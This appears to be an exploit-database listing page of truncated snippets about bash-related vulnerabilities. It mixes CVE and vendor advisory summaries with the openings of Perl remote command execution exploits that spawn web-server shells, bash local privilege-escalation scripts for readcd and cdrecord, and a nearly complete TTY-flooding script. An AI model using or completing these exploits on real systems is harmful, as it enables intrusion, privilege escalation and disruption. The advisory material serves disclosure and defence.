GFHost PHP GMail - Remote Command Execution

GFHost PHP GMail - Remote Command Execution GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 =...

GFHost PHP GMail Remote Command Execution Exploit

Exploit for unknown platform in category web applications ================================================= GFHost PHP GMail Remote Command Execution Exploit ================================================= GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This...

GFHost.pl

GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 =...

USN-28-1: sudo vulnerability

Liam Helmer discovered an input validation flaw in sudo. When the standard shell "bash" starts up, it searches the environment for variables with a value beginning with "". For each of these variables a function with the same name is created, with the function body filled in from the environment...

technote.pl

Technote Inc. from Korea Command Excution Spawn bash style Shell with webserver uid This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my $pdf; my $url1; my $number; my $url2; my $shiz; my @results; my $probe; my @U; $U1 =...

sudo -- privilege escalation with bash scripts

A Sudo Security Alerts reports: A flaw in exists in sudo's environment sanitizing prior to sudo version 1.6.8p2 that could allow a malicious user with permission to run a shell script that utilized the bash shell to run arbitrary commands...

Unpassworded 'bash' Backdoor Account

The account 'bash' has no password set. An attacker may use it to gain further privileges on this system. This account was likely created by a backdoor installed by a fake Linux RedHat patch. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc...

CDRecord's ReadCD - Local Privilege Escalation

!/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.org" echo "Date :09.13.2004" echo "IRC : irc.chroot.org discuss" export READCD=/usr/bin/readcd cd /tmp cat s.c include include int main setuid0;setgid0; chown"/tmp/ss", 0, 0;...

cdrecord $RSH exec() SUID Shell Creation

Exploit for linux platform in category local exploits ======================================== cdrecord $RSH exec SUID Shell Creation ======================================== !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat...

WebCart.pl

WebCart exploit Spawn bash style Shell with webserver uid Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 =...

ShopCart.pl

Shopcart exploit Spawn bash style Shell with webserver uid Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 = "/cgi-local/shop.pl/page=;";...

cpanel.pl

cpanel-plus.pl exploit Spawn bash style Shell on Apache CPANEL Spabam 2003 PRIV8 code hackarena irc.brasnet.org This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; my $shit; $U1 =...

Restricted Shells

I have recently realized a security issue in some of the restricted shells on NIX systems. I am not sure if I am the first one to discover the problem I am going to discuss but I am sure that it has not been posted yet, atleast not that I know of. Basically this is the issue: Affected Systems:...

CVE-1999-1048

Buffer overflow in bash 2.0.0, 1.4.17, and other versions allows local attackers to gain privileges by creating an extremely large directory name, which is inserted into the password prompt via the \w option in the PS1 environmental variable when another user changes into that directory...

CVE-1999-1048

CVE-1999-1048 affects Bash versions including 2.0.0 and 1.4.17, where a buffer overflow can be triggered by an extremely large directory name. The vulnerability is exploited via the PS1 prompt (\w) when another user changes into that directory, enabling local privilege escalation. The provided do...

CVE-1999-1383

1 bash before 1.14.7, and 2 tcsh 6.05 allow local users to gain privileges via directory names that contain shell metacharacters back-tick, which can cause the commands enclosed in the directory name to be executed when the shell expands filenames using the \w option in the PS1 variable...

CVE-1999-1383

CVE-1999-1383 affects bash (before 1.14.7) and tcsh (6.05). The vulnerability arises when a directory name contains shell metacharacters (back-tick) that are expanded during filename expansion for the PS1 variable, allowing local users to gain privileges. Affects local privilege escalation via di...

Symlinks symlinks...this time KTVision

Hi ppl, the subject already states the problem: there is a symlink follow problem in the in many distributions suid root ktvision binary = 0.1.1-271. It is discouraging that nowadays such trivial symlink attacks are still possible. No comment anymore. In order to be complete: a bash script...

FreeBSD-SA-01:03.bash1

-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:03 Security Advisory FreeBSD, Inc. Topic: bash1 creates insecure temporary files Category: ports Module: bash1 Announced: 2001-01-15 Affects: Ports collection prior to th...

RedHat 6.1/6.2 - TTY Flood Users

!/bin/bash by teleh0r TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=tty To prevent flooding of one's own TTY while /bin/true ; do for i in $TTYDIR/ ; do if -w $i -a -c $i -a $i != $MYTTY ; then cat $NONSENSE $i fi done done unset i milw0rm.com 2001-01-02...